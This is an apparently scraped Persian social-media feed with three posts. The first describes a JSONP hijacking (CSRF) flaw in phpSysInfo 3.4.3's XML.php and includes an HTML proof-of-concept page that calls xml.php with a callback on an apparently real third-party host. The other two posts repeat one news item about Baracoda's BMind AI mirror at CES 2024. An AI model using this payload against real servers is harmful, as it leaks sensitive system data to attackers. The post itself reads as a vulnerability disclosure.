ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
آسیب پذیری Cross Site Request Forgery (CSRF) در Phpsysinfo نسخه 3.4.3 به مهاجم از راه دور اجازه می دهد تا اطلاعات حساس را از طریق یک صفحه دستکاری شده در فایل XML.php به دست آورد.
phpsysinfo v3.4.3
دارای آسیب پذیری JSONP است. فایل XML.php دارای آسیب پذیری JSONP hijacking است. هنگامی که کاربر از صفحه ای بازدید می کند که با دقت توسط مهاجم ساخته شده است، داده های JSON به دست می آید و برای مهاجم ارسال می شود.
حالا فرآینده این حمله چطوری است ؟
به سادگی از یک فایل PHP برای ارسال داده های JSON بازیابی شده به سرور خود با استفاده از XMLHttpRequest استفاده می کند.
در اینجا کد HTML برای اثبات فایل مفهومی آمده است:
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title></title>
<script src="http://apps.bdimg.com/libs/jquery/1.10.2/jquery.min.js"></script>
</head>
<body>
<script>
function dezsbrxdio(data){ alert(JSON.stringify(data)); }
</script>
<script src="https://phpbb.trabitechnik.com/xml.php?json&callback=dezsbrxdio&jsonp=dezsbrxdio&cb=dezsbrxdio&json=dezsbrxdio">
</script>
</body>
</html>
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
❤5👍2😍1
یک شرکت فرانسوی اولین آینه هوشمند هوش مصنوعی جهان را عرضه کرد: این آینه می تواند احساسات کاربران را شناسایی کند و استرس را از بین ببرد.
در طول نمایشگاه CES 2024، یک شرکت فناوری سلامت هوشمند فرانسوی به نام Baracoda اولین آینه هوشمند هوش مصنوعی جهان BMind را منتشر کرد. طبق بیانیه رسمی، این آینه ای است که مخصوص سلامت روان طراحی شده است که می تواند احساسات را شناسایی کرده و به مدیریت استرس کمک کند.
از نظر تعامل، کاربران می توانند از طریق صدا، حرکات و غیره با آینه ارتباط برقرار کنند، به عنوان مثال، مشت زدن یا ضربه زدن می تواند به منوی اصلی بازگردد و ژست برای انتخاب محتوای فعلی یک انگشت است.
Link
https://www.ithome.com/0/743/950.htm
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
در طول نمایشگاه CES 2024، یک شرکت فناوری سلامت هوشمند فرانسوی به نام Baracoda اولین آینه هوشمند هوش مصنوعی جهان BMind را منتشر کرد. طبق بیانیه رسمی، این آینه ای است که مخصوص سلامت روان طراحی شده است که می تواند احساسات را شناسایی کرده و به مدیریت استرس کمک کند.
از نظر تعامل، کاربران می توانند از طریق صدا، حرکات و غیره با آینه ارتباط برقرار کنند، به عنوان مثال، مشت زدن یا ضربه زدن می تواند به منوی اصلی بازگردد و ژست برای انتخاب محتوای فعلی یک انگشت است.
Link
https://www.ithome.com/0/743/950.htm
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
👍1😍1